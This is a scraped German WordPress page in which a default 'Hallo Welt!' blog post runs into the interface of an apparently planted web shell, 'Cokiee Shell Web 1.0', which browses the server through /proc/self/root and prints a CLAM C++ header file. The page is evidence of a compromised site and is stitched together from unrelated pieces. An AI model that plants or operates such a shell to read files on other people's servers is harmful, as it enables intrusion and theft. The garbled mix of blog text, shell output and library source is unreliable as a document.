Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/include/CLAM/ |
Current File : //proc/self/root/usr/include/CLAM/SimpleLoopMetadata.hxx |
#ifndef _SimpleLoopMetadata_ #define _SimpleLoopMetadata_ #include "IndexArray.hxx" #include "Processing.hxx" #include "Err.hxx" #include "SDIFInConfig.hxx" #include "Filename.hxx" #include "ELoopPointUnits.hxx" namespace CLAM { /** * This object represents the start and end points of a loop. The given values * should be in milliseconds. * * \author greg kellum [gkellum@iua.upf.edu] 15/7/2007 * \since CLAM v1.1. */ class SimpleLoopMetadata : public DynamicType { public: DYNAMIC_TYPE (SimpleLoopMetadata, 3); DYN_ATTRIBUTE(0, public, ELoopPointUnits, Units); DYN_ATTRIBUTE(1, public, int, Start); DYN_ATTRIBUTE(2, public, int, End); // TODO define a new type for EnvelopeStage // DYN_ATTRIBUTE(3,public, EnvelopeStage, EnvelopeStage); void DefaultInit(); }; } // end namespace CLAM #endif
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare